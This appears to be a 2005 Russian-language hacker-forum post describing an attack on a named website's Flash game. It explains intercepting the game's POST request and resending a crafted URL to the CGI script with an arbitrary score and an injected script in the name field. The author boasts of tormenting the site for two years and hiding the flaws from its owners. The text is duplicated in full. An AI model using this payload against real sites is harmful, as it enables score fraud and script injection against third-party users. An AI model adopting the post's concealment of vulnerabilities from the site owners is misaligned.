Dmitro
29.09.2005, 02:12
Атака через флэш-игру
Сразу кидаю линк на багу: http://borneo.ru/game/
Там внизу таблица с результатами игры, я сначала скрипты понавешал, а потом решил всё убрать, а то мало ли... обидятся ))
Ну вообщем там не должно по идее быть такого...
Карочи, фсё просто, когда заканчивается флэsh-игра, то сценарий отправляет POST на CGI,
перехватываем его чемниТь типа Naviscope
и отправляем другие данные на скрипт (в урл формате):
borneo.ru/cgi-bin/game/game.cgi?loadedBytes=283400&totalBytes=283400&go=%5Btype+
Function%5D&a=224%2C254%2C320%2C380%2C420&b=390%2C363%2C340%2C360%2C405&puli=
2&patron=0&i=6&tur=0&points=ЗДЕСЬ_МОИ_ОЧКИ&g=5&labla=lev52&name=ЗДЕСЬ_МОЙ_СКРИПТ
мм...да... я их мучаю уже второй год, там уж в чате более половины функций удалили...
Но мы им не скажем... пусть думают, что эти глюки от перебоев в электросети
Сразу кидаю линк на багу: http://borneo.ru/game/
Там внизу таблица с результатами игры, я сначала скрипты понавешал, а потом решил всё убрать, а то мало ли... обидятся ))
Ну вообщем там не должно по идее быть такого...
Карочи, фсё просто, когда заканчивается флэsh-игра, то сценарий отправляет POST на CGI,
перехватываем его чемниТь типа Naviscope
и отправляем другие данные на скрипт (в урл формате):
borneo.ru/cgi-bin/game/game.cgi?loadedBytes=283400&totalBytes=283400&go=%5Btype+
Function%5D&a=224%2C254%2C320%2C380%2C420&b=390%2C363%2C340%2C360%2C405&puli=
2&patron=0&i=6&tur=0&points=ЗДЕСЬ_МОИ_ОЧКИ&g=5&labla=lev52&name=ЗДЕСЬ_МОЙ_СКРИПТ
мм...да... я их мучаю уже второй год, там уж в чате более половины функций удалили...
Но мы им не скажем... пусть думают, что эти глюки от перебоев в электросети